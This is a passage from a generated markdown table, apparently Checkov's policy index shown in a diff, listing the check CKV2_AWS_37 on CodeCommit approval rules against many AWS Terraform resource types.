[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 983 | CKV2_AWS_37 | resource | aws_codepipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 984 | CKV2_AWS_37 | resource | aws_codepipeline_webhook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 985 | CKV2_AWS_37 | resource | aws_codestarnotifications_notification_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 986 | CKV2_AWS_37 | resource | aws_cognito_identity_pool | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 987 | CKV2_AWS_37 | resource | aws_cognito_identity_pool_roles_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 988 | CKV2_AWS_37 | resource | aws_cognito_identity_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 989 | CKV2_AWS_37 | resource | aws_cognito_resource_server | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 990 | CKV2_AWS_37 | resource | aws_cognito_user_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 991 | CKV2_AWS_37 | resource | aws_cognito_user_pool | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 992 | CKV2_AWS_37 | resource | aws_cognito_user_pool_client | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 993 | CKV2_AWS_37 | resource | aws_cognito_user_pool_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 994 | CKV2_AWS_37 | resource | aws_config_aggregate_authorization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 995 | CKV2_AWS_37 | resource | aws_config_config_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 996 | CKV2_AWS_37 | resource | aws_config_configuration_aggregator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 997 | CKV2_AWS_37 | resource | aws_config_configuration_recorder | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 998 | CKV2_AWS_37 | resource | aws_config_configuration_recorder_status | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 999 | CKV2_AWS_37 | resource | aws_config_delivery_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1000 | CKV2_AWS_37 | resource | aws_config_organization_custom_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1001 | CKV2_AWS_37 | resource | aws_config_organization_managed_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1002 | CKV2_AWS_37 | resource | aws_cur_report_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1003 | CKV2_AWS_37 | resource | aws_customer_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1004 | CKV2_AWS_37 | resource | aws_datapipeline_pipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1005 | CKV2_AWS_37 | resource | aws_datasync_agent | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1006 | CKV2_AWS_37 | resource | aws_datasync_location_efs | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1007 | CKV2_AWS_37 | resource | aws_datasync_location_nfs | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1008 | CKV2_AWS_37 | resource | aws_datasync_location_s3 | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1009 | CKV2_AWS_37 | resource | aws_datasync_location_smb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1010 | CKV2_AWS_37 | resource | aws_datasync_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1011 | CKV2_AWS_37 | resource | aws_dax_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1012 | CKV2_AWS_37 | resource | aws_dax_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1013 | CKV2_AWS_37 | resource | aws_dax_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1014 | CKV2_AWS_37 | resource | aws_db_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1015 | CKV2_AWS_37 | resource | aws_db_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1016 | CKV2_AWS_37 | resource | aws_db_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1017 | CKV2_AWS_37 | resource | aws_db_instance_role_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1018 | CKV2_AWS_37 | resource | aws_db_option_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1019 | CKV2_AWS_37 | resource | aws_db_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1020 | CKV2_AWS_37 | resource | aws_db_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1021 | CKV2_AWS_37 | resource | aws_db_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1022 | CKV2_AWS_37 | resource | aws_db_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1023 | CKV2_AWS_37 | resource | aws_default_network_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1024 | CKV2_AWS_37 | resource | aws_default_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1025 | CKV2_AWS_37 | resource | aws_default_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1026 | CKV2_AWS_37 | resource | aws_default_subnet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1027 | CKV2_AWS_37 | resource | aws_default_vpc | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1028 | CKV2_AWS_37 | resource | aws_default_vpc_dhcp_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1029 | CKV2_AWS_37 | resource | aws_devicefarm_project | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1030 | CKV2_AWS_37 | resource | aws_directory_service_conditional_forwarder | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1031 | CKV2_AWS_37 | resource | aws_directory_service_directory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1032 | CKV2_AWS_37 | resource | aws_directory_service_log_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1033 | CKV2_AWS_37 | resource | aws_dlm_lifecycle_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1034 | CKV2_AWS_37 | resource | aws_dms_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1035 | CKV2_AWS_37 | resource | aws_dms_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1036 | CKV2_AWS_37 | resource | aws_dms_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1037 | CKV2_AWS_37 | resource | aws_dms_replication_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1038 | CKV2_AWS_37 | resource | aws_dms_replication_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1039 | CKV2_AWS_37 | resource | aws_dms_replication_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1040 | CKV2_AWS_37 | resource | aws_docdb_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1041 | CKV2_AWS_37 | resource | aws_docdb_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1042 | CKV2_AWS_37 | resource | aws_docdb_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1043 | CKV2_AWS_37 | resource | aws_docdb_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1044 | CKV2_AWS_37 | resource | aws_docdb_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1045 | CKV2_AWS_37 | resource | aws_dx_bgp_peer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1046 | CKV2_AWS_37 | resource | aws_dx_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1047 | CKV2_AWS_37 | resource | aws_dx_connection_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1048 | CKV2_AWS_37 | resource | aws_dx_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1049 | CKV2_AWS_37 | resource | aws_dx_gateway_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1050 | CKV2_AWS_37 | resource | aws_dx_gateway_association_proposal | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1051 | CKV2_AWS_37 | resource | aws_dx_hosted_private_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1052 | CKV2_AWS_37 | resource | aws_dx_hosted_private_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1053 | CKV2_AWS_37 | resource | aws_dx_hosted_public_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1054 | CKV2_AWS_37 | resource | aws_dx_hosted_public_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1055 | CKV2_AWS_37 | resource | aws_dx_hosted_transit_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1056 | CKV2_AWS_37 | resource | aws_dx_hosted_transit_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1057 | CKV2_AWS_37 | resource | aws_dx_lag | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1058 | CKV2_AWS_37 | resource | aws_dx_private_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1059 | CKV2_AWS_37 | resource | aws_dx_public_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1060 | CKV2_AWS_37 | resource | aws_dx_transit_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1061 | CKV2_AWS_37 | resource | aws_dynamodb_global_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1062 | CKV2_AWS_37 | resource | aws_dynamodb_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1063 | CKV2_AWS_37 | resource | aws_dynamodb_table_item | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1064 | CKV2_AWS_37 | resource | aws_ebs_default_kms_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1065 | CKV2_AWS_37 | resource | aws_ebs_encryption_by_default | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1066 | CKV2_AWS_37 | resource | aws_ebs_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1067 | CKV2_AWS_37 | resource | aws_ebs_snapshot_copy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1068 | CKV2_AWS_37 | resource | aws_ebs_volume | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1069 | CKV2_AWS_37 | resource | aws_ec2_availability_zone_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1070 | CKV2_AWS_37 | resource | aws_ec2_capacity_reservation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1071 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_authorization_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1072 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1073 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_network_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1074 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1075 | CKV2_AWS_37 | resource | aws_ec2_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1076 | CKV2_AWS_37 | resource | aws_ec2_local_gateway_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1077 | CKV2_AWS_37 | resource | aws_ec2_local_gateway_route_table_vpc_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1078 | CKV2_AWS_37 | resource | aws_ec2_tag | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1079 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1080 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_filter_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1081 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_session | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1082 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1083 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1084 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_peering_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1085 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_peering_attachment_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1086 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route | Ensure CodeCommit associates an approval rule | Terraform | 